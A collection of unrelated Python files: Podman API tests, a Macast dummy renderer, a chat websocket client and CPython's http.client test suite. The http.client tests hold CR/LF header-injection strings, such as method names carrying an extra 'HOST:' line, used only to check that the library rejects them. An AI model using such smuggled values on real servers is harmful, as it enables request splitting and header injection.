r = requests.delete(self.podman_url + f"/v1.40/containers/{container_id}")
self.assertEqual(r.status_code, 204, r.text)
def test_top_no_stream(self):
uri = self.uri(self.resolve_container("/containers/{}/top"))
q = queue.Queue()
def _impl(fifo):
fifo.put(requests.get(uri, params={"stream": False}, timeout=2))
top = threading.Thread(target=_impl, args=(q,))
top.start()
time.sleep(2)
self.assertFalse(top.is_alive(), f"GET {uri} failed to return in 2s")
qr = q.get(False)
self.assertEqual(qr.status_code, 200, qr.text)
qr.close()
top.join()
def test_top_stream(self):
uri = self.uri(self.resolve_container("/containers/{}/top"))
q = queue.Queue()
stop_thread = False
def _impl(fifo, stop):
try:
with requests.get(uri, params={"stream": True, "delay": 1}, stream=True) as r:
r.raise_for_status()
fifo.put(r)
for buf in r.iter_lines(chunk_size=None):
if stop():
break
fifo.put(buf)
except Exception:
pass
top = threading.Thread(target=_impl, args=(q, (lambda: stop_thread)))
top.start()
time.sleep(4)
self.assertTrue(top.is_alive(), f"GET {uri} exited too soon")
stop_thread = True
for _ in range(10):
try:
qr = q.get_nowait()
if qr is not None:
self.assertEqual(qr.status_code, 200)
qr.close()
break
except queue.Empty:
pass
finally:
time.sleep(1)
else:
self.fail("Server failed to respond in 10s")
top.join()
def test_memory(self):
r = requests.post(
self.podman_url + "/v1.4.0/libpod/containers/create",
json={
"Name": "memory",
"Cmd": ["top"],
"Image": "alpine:latest",
"Resource_Limits": {
"Memory":{
"Limit": 1000,
},
"CPU":{
"Shares": 200,
},
},
},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(self.podman_url + f"/v1.40/containers/{container_id}/json")
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
out = r.json()
self.assertEqual(2000, out["HostConfig"]["MemorySwap"])
self.assertEqual(1000, out["HostConfig"]["Memory"])
if __name__ == "__main__":
unittest.main()
|
example.py
|
# Copyright (c) 2021 by xfangfang. All Rights Reserved.
#
# Macast Dummy media renderer
#
# Macast Metadata
# <macast.title>Dummy Renderer</macast.title>
# <macast.renderer>DummyRenderer</macast.renderer>
# <macast.platform>darwin,linux,win32</macast.platform>
# <macast.version>0.1</macast.version>
# <macast.author>xfangfang</macast.author>
# <macast.desc>Macast Dummy media renderer</macast.desc>
import os
import time
import threading
import cherrypy
import subprocess
from macast import cli
from macast.renderer import Renderer
class DummyRenderer(Renderer):
def __init__(self):
super(DummyRenderer, self).__init__()
self.start_position = 0
self.position_thread_running = True
self.position_thread = threading.Thread(target=self.position_tick, daemon=True)
self.position_thread.start()
def position_tick(self):
while self.position_thread_running:
time.sleep(1)
self.start_position += 1
sec = self.start_position
position = '%d:%02d:%02d' % (sec // 3600, (sec % 3600) // 60, sec % 60)
self.set_state_position(position)
def set_media_stop(self):
self.set_state_transport('STOPPED')
cherrypy.engine.publish('renderer_av_stop')
def set_media_url(self, url):
self.set_media_stop()
self.start_position = 0
print(url)
self.set_state_transport("PLAYING")
cherrypy.engine.publish('renderer_av_uri', url)
def stop(self):
super(DummyRenderer, self).stop()
self.set_media_stop()
print("Dummy stop")
cherrypy.engine.publish('renderer_av_stop')
def start(self):
super(DummyRenderer, self).start()
print("Dummy start")
if __name__ == '__main__':
cli(DummyRenderer())
|
socket.py
|
import json
import threading
import time
import websocket
class SocketHandler():
def __init__(self, client, socket_trace=False):
"""
Build the websocket connection.
client: client that owns the websocket connection.
"""
websocket.enableTrace(True)
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.active = False
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
websocket.enableTrace(socket_trace)
def on_open(self):
return 1
def on_close(self):
self.active = False
if self.reconnect:
self.start()
print("reopened")
print("closed")
def on_ping(self, data):
self.socket.sock.pong(data)
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
self.socket.send(data)
def start(self):
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message=self.handle_message,
on_open=self.on_open,
on_close=self.on_close,
on_ping=self.on_ping,
header=self.headers
)
self.socket_thread = threading.Thread(target=self.socket.run_forever, kwargs={"ping_interval": 60})
self.socket_thread.daemon = True
self.socket_thread.start()
self.active = True
def close(self):
self.reconnect = False
self.active = False
self.socket.close()
class Callbacks:
def __init__(self, client):
"""
Build the callback handler.
This is meant to be subclassed, where desided methods would be redefined.
client: Client to be used
"""
self.client = client
self.methods = {
1000: self._resolve_chat_message
}
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite
}
def _resolve_chat_message(self, data):
"""
Resolves to a chat method based on the data's `chatMessage > type` and `chatMessage > mediaType` parameter.
if there is no `mediaType`, then the default fallback value `0` will be used
returns the return value of the appropriate method
"""
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def resolve(self, data):
"""
Resolves to a method based on the data's `t` parameter.
returns the return value of the appropriate method
"""
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def on_text_message(self, data):
"""
Called when a text chat message is received.
"""
pass
def on_image_message(self, data):
pass
def on_youtube_message(self, data):
pass
def on_voice_message(self, data):
pass
def on_sticker_message(self, data):
pass
def on_group_member_join(self, data):
pass
def on_group_member_leave(self, data):
pass
def on_chat_invite(self, data):
pass
def default(self, data):
"""
Called when the parameter `t` is not matched.
"""
pass
|
test_httplib.py
|
import enum
import errno
from http import client, HTTPStatus
import io
import itertools
import os
import array
import re
import socket
import threading
import warnings
import unittest
from unittest import mock
TestCase = unittest.TestCase
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import warnings_helper
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = socket_helper.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_dir_with_added_behavior_on_status(self):
# see issue40084
self.assertTrue({'description', 'name', 'phrase', 'value'} <= set(dir(HTTPStatus(404))))
def test_simple_httpstatus(self):
class CheckedHTTPStatus(enum.IntEnum):
"""HTTP status codes and reason phrases
Status codes from the following RFCs are all observed:
* RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616
* RFC 6585: Additional HTTP Status Codes
* RFC 3229: Delta encoding in HTTP
* RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518
* RFC 5842: Binding Extensions to WebDAV
* RFC 7238: Permanent Redirect
* RFC 2295: Transparent Content Negotiation in HTTP
* RFC 2774: An HTTP Extension Framework
* RFC 7725: An HTTP Status Code to Report Legal Obstacles
* RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2)
* RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)
* RFC 8297: An HTTP Status Code for Indicating Hints
* RFC 8470: Using Early Data in HTTP
"""
def __new__(cls, value, phrase, description=''):
obj = int.__new__(cls, value)
obj._value_ = value
obj.phrase = phrase
obj.description = description
return obj
# informational
CONTINUE = 100, 'Continue', 'Request received, please continue'
SWITCHING_PROTOCOLS = (101, 'Switching Protocols',
'Switching to new protocol; obey Upgrade header')
PROCESSING = 102, 'Processing'
EARLY_HINTS = 103, 'Early Hints'
# success
OK = 200, 'OK', 'Request fulfilled, document follows'
CREATED = 201, 'Created', 'Document created, URL follows'
ACCEPTED = (202, 'Accepted',
'Request accepted, processing continues off-line')
NON_AUTHORITATIVE_INFORMATION = (203,
'Non-Authoritative Information', 'Request fulfilled from cache')
NO_CONTENT = 204, 'No Content', 'Request fulfilled, nothing follows'
RESET_CONTENT = 205, 'Reset Content', 'Clear input form for further input'
PARTIAL_CONTENT = 206, 'Partial Content', 'Partial content follows'
MULTI_STATUS = 207, 'Multi-Status'
ALREADY_REPORTED = 208, 'Already Reported'
IM_USED = 226, 'IM Used'
# redirection
MULTIPLE_CHOICES = (300, 'Multiple Choices',
'Object has several resources -- see URI list')
MOVED_PERMANENTLY = (301, 'Moved Permanently',
'Object moved permanently -- see URI list')
FOUND = 302, 'Found', 'Object moved temporarily -- see URI list'
SEE_OTHER = 303, 'See Other', 'Object moved -- see Method and URL list'
NOT_MODIFIED = (304, 'Not Modified',
'Document has not changed since given time')
USE_PROXY = (305, 'Use Proxy',
'You must use proxy specified in Location to access this resource')
TEMPORARY_REDIRECT = (307, 'Temporary Redirect',
'Object moved temporarily -- see URI list')
PERMANENT_REDIRECT = (308, 'Permanent Redirect',
'Object moved permanently -- see URI list')
# client error
BAD_REQUEST = (400, 'Bad Request',
'Bad request syntax or unsupported method')
UNAUTHORIZED = (401, 'Unauthorized',
'No permission -- see authorization schemes')
PAYMENT_REQUIRED = (402, 'Payment Required',
'No payment -- see charging schemes')
FORBIDDEN = (403, 'Forbidden',
'Request forbidden -- authorization will not help')
NOT_FOUND = (404, 'Not Found',
'Nothing matches the given URI')
METHOD_NOT_ALLOWED = (405, 'Method Not Allowed',
'Specified method is invalid for this resource')
NOT_ACCEPTABLE = (406, 'Not Acceptable',
'URI not available in preferred format')
PROXY_AUTHENTICATION_REQUIRED = (407,
'Proxy Authentication Required',
'You must authenticate with this proxy before proceeding')
REQUEST_TIMEOUT = (408, 'Request Timeout',
'Request timed out; try again later')
CONFLICT = 409, 'Conflict', 'Request conflict'
GONE = (410, 'Gone',
'URI no longer exists and has been permanently removed')
LENGTH_REQUIRED = (411, 'Length Required',
'Client must specify Content-Length')
PRECONDITION_FAILED = (412, 'Precondition Failed',
'Precondition in headers is false')
REQUEST_ENTITY_TOO_LARGE = (413, 'Request Entity Too Large',
'Entity is too large')
REQUEST_URI_TOO_LONG = (414, 'Request-URI Too Long',
'URI is too long')
UNSUPPORTED_MEDIA_TYPE = (415, 'Unsupported Media Type',
'Entity body in unsupported format')
REQUESTED_RANGE_NOT_SATISFIABLE = (416,
'Requested Range Not Satisfiable',
'Cannot satisfy request range')
EXPECTATION_FAILED = (417, 'Expectation Failed',
'Expect condition could not be satisfied')
IM_A_TEAPOT = (418, 'I\'m a Teapot',
'Server refuses to brew coffee because it is a teapot.')
MISDIRECTED_REQUEST = (421, 'Misdirected Request',
'Server is not able to produce a response')
UNPROCESSABLE_ENTITY = 422, 'Unprocessable Entity'
LOCKED = 423, 'Locked'
FAILED_DEPENDENCY = 424, 'Failed Dependency'
TOO_EARLY = 425, 'Too Early'
UPGRADE_REQUIRED = 426, 'Upgrade Required'
PRECONDITION_REQUIRED = (428, 'Precondition Required',
'The origin server requires the request to be conditional')
TOO_MANY_REQUESTS = (429, 'Too Many Requests',
'The user has sent too many requests in '
'a given amount of time ("rate limiting")')
REQUEST_HEADER_FIELDS_TOO_LARGE = (431,
'Request Header Fields Too Large',
'The server is unwilling to process the request because its header '
'fields are too large')
UNAVAILABLE_FOR_LEGAL_REASONS = (451,
'Unavailable For Legal Reasons',
'The server is denying access to the '
'resource as a consequence of a legal demand')
# server errors
INTERNAL_SERVER_ERROR = (500, 'Internal Server Error',
'Server got itself in trouble')
NOT_IMPLEMENTED = (501, 'Not Implemented',
'Server does not support this operation')
BAD_GATEWAY = (502, 'Bad Gateway',
'Invalid responses from another server/proxy')
SERVICE_UNAVAILABLE = (503, 'Service Unavailable',
'The server cannot process the request due to a high load')
GATEWAY_TIMEOUT = (504, 'Gateway Timeout',
'The gateway server did not receive a timely response')
HTTP_VERSION_NOT_SUPPORTED = (505, 'HTTP Version Not Supported',
'Cannot fulfill request')
VARIANT_ALSO_NEGOTIATES = 506, 'Variant Also Negotiates'
INSUFFICIENT_STORAGE = 507, 'Insufficient Storage'
LOOP_DETECTED = 508, 'Loop Detected'
NOT_EXTENDED = 510, 'Not Extended'
NETWORK_AUTHENTICATION_REQUIRED = (511,
'Network Authentication Required',
'The client needs to authenticate to gain network access')
enum._test_simple_enum(CheckedHTTPStatus, HTTPStatus)
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_past_end(self):
# if we have Content-Length, clip reads to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(10), b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_past_end(self):
# if we have Content-Length, clip readintos to the end
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(10)
n = resp.readinto(b)
self.assertEqual(n, 4)
self.assertEqual(bytes(b)[:4], b'Text')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
